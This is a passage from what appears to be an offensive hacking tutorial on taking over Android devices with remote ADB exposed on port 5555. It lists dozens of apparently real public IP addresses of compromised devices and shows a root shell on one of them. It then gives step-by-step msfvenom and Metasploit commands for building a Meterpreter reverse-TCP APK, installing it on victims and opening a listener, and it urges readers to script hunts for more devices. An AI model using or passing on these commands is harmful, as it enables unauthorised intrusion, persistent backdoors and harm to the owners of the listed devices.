connected to 118.161.216.47:5555
connected to 24.222.139.184:5555
connected to 175.125.24.143:5555
connected to 218.191.106.190:5555
connected to 113.254.141.47:5555
connected to 91.247.107.164:5555
connected to 49.72.210.171:5555
connected to 114.39.245.43:5555
connected to 178.163.11.211:5555
connected to 203.115.98.94:5555
connected to 14.136.53.43:5555
connected to 190.95.46.226:5555
connected to 212.75.143.220:5555
connected to 83.209.25.67:5555
connected to 211.215.164.133:5555
connected to 213.113.235.218:5555
connected to 121.34.28.60:5555
connected to 117.215.191.170:5555
connected to 121.202.94.21:5555
connected to 186.95.32.108:5555
connected to 222.117.48.55:5555
connected to 61.74.128.26:5555
connected to 180.231.9.40:5555
connected to 123.202.214.136:5555
connected to 112.119.26.150:5555
connected to 3.87.24.81:5555
connected to 110.12.38.184:5555
....
..
blah
3. Cool! Loads of targets connected. Now, let's check our loot:
$ adb devices -l
List of devices attached
175.123.154.132:5555 device product:BHX-S100 model:BHX_S100 device:BHX-S100 transport_id:48
14.45.245.156:5555 device product:SM-G930S model:SM_G930S device:x86 transport_id:47
218.250.50.75:5555 device product:mars_a31s model:Q_BOX_02 device:mars-a31s transport_id:46
190.73.138.178:5555 device product:android_x86 model:Intel_powered_classmate_PC device:x86 transport_id:45
41.77.214.61:5555 device product:CVTE_MSD338_512M_PC821 model:CVTE_MSD338_512M device:CVTE_MSD338_512M_PC821 transport_id:44
93.7.87.40:5555 device product:rk322x_box model:HK1_MINI device:rk322x_box transport_id:43
121.132.211.218:5555 device product:Hi3796MV100 model:Hi3796MV100 device:Hi3796MV100 transport_id:42
110.12.38.184:5555 device product:p20x model:TV006 device:kiii_2g transport_id:41
3.87.24.81:5555 device product:cloud model:Genymotion__Phone__version device:cloud transport_id:40
112.119.26.150:5555 device product:dolphin_fvd_p1 model:Global_Edition_S800 device:dolphin-fvd-p1 transport_id:39
123.202.214.136:5555 device product:rk3328_box model:BOSSTV_V2 device:rk3328_box transport_id:38
180.231.9.40:5555 device product:tvg2a model:S60UPI device:tvg2a transport_id:37
61.74.128.26:5555 device product:android_x86 model:Default_string device:x86 transport_id:36
222.117.48.55:5555 device product:ja3gxx model:GT_I9500 device:ja3g transport_id:35
186.95.32.108:5555 device product:android_x86 model:H61H2_CM device:x86 transport_id:34
121.202.94.21:5555 device product:msm8909 model:N5 device:msm8909 transport_id:33
117.215.191.170:5555 device product:hlteuc model:SAMSUNG_SM_N900A device:hlteatt transport_id:32
121.34.28.60:5555 device product:rk3328_box model:L1PRO device:rk3328_box transport_id:31
213.113.235.218:5555 device product:rk322x_box model:AILETV device:rk322x_box transport_id:30
211.215.164.133:5555 device product:petrel_fvd_p1 model:EVPAD_3PRO device:petrel-p1 transport_id:29
83.209.25.67:5555 device product:p201 model:MXQ_Pro device:p201 transport_id:28
212.75.143.220:5555 device product:rk322x_box model:TTK_Box_214 device:rk322x transport_id:27
190.95.46.226:5555 device product:aosp_cranberry model:SMART device:cranberry transport_id:26
14.136.53.43:5555 device product:mars_a31s model:Q_BOX_02 device:mars-a31s transport_id:25
203.115.98.94:5555 device product:QezyTV Remotely Managed STB model:HD700 device:QezyTV transport_id:24
178.163.11.211:5555 device product:NV501WAC model:NV501WAC device:NV501WAC transport_id:23
114.39.245.43:5555 device product:ghost_retasia model:XT1052 device:ghost transport_id:22
49.72.210.171:5555 device product:MagicBox_M16C model:MagicBox_M16C device:MagicBox_M16C transport_id:21
91.247.107.164:5555 device product:g18ref model:Android_TV device:g18ref transport_id:20
113.254.141.47:5555 device product:mars_a31s512m model:Quad_Core device:mars-a31s512m transport_id:19
218.191.106.190:5555 device product:VIDAA_TV model:VIDAA_TV device:Hi3751 transport_id:18
...
..
blah
blah.
4. As you can see, there are tons of vulnerable Android boxes out there :-) Let's connect to one target that appears to be a Samsung S7 phone:
$ adb -s 14.45.245.156 shell
root@x86:/ # id
uid=0(root) gid=0(root) groups=1003(graphics),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats)
root@x86:/ # uname -a
Linux localhost 4.0.9-android-x86 #1 SMP PREEMPT Wed Oct 25 02:01:32 PDT 2017 i686 GNU/Linux
root@x86:/ # uptime
up time: 09:55:06, idle time: 06:30:03, sleep time: 00:00:00
root@x86:/ # df
Filesystem Size Used Free Blksize
/ 501.6M 2.4M 499.2M 4096
/dev 502.4M 32.0K 502.4M 4096
/sys/fs/cgroup 502.4M 12.0K 502.4M 4096
/system 591.2M 447.0M 144.2M 4096
/cache 369.5M 212.0K 369.3M 4096
/data 11.4G 3.9G 7.6G 4096
/mnt/asec 502.4M 0.0K 502.4M 4096
/mnt/obb 502.4M 0.0K 502.4M 4096
/mnt/temp 502.4M 8.0K 502.4M 4096
/mnt/shared/Applications 48.8G 35.6G 13.2G 4096
/mnt/shared/Pictures 48.8G 35.6G 13.2G 4096
/mnt/shared/Misc 48.8G 35.6G 13.2G 4096
/mnt/shared/Bug 48.8G 35.6G 13.2G 4096
/data/media/0/Applications 48.8G 35.6G 13.2G 4096
/data/media/0/Pictures 48.8G 35.6G 13.2G 4096
/data/media/0/Misc 48.8G 35.6G 13.2G 4096
/mnt/shell/emulated 11.4G 3.9G 7.6G 4096
root@x86:/ # >
5. W00t! We already got r00t on one target. If you are smart, you can script this command further to hunt for more r00ted devices.
Backdooring with Meterpreter
Optionally, you can generate your own Meterpreter shell and upload it to the victims, though I feel this is a waste of time as adb provides way more cool/evil features:
1. Gen meterpreter payload:
$ msfvenom -p android/meterpreter/reverse_tcp LHOST=<YOUR IP> LPORT=4444 -f raw -o android.apk
2. Upload it to targets:
$ adb -s <TARGET IP>:5555 install android.apk
3. Start msfconsole listener:
# msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST xxxxxx
set LPORT xxxxxx
run
4. Start the meterpreter shell:
$ adb -s <TARGET IP>:5555 shell am start -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
Summary
There are many evil commands that can be executed using adb; just refer to https://developer.android.com/studio/command-line/adb. You can practically do anything to the Android box since you are root. The great part about 0wning Android devices is that you don't have to deal with anti-virus, as hardly anyone installs it on mobile devices.
References
https://www.bleepingcomputer.com/news/security/tens-of-thousands-of-android-devices-are-exposing-their-debug-port/
https://forum.xda-developers.com/android/software/guide-installing-adb-fastboot-linux-adb-t3478678
https://futurestud.io/tutorials/how-to-debug-your-android-app-over-wifi-without-root
https://medium.com/@madrobot/exploiting-android-devices-running-insecure-remote-adb-service-4490cc6a2282
https://resources.infosecinstitute.com/lab-android-exploitation-with-kali/#gref
https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md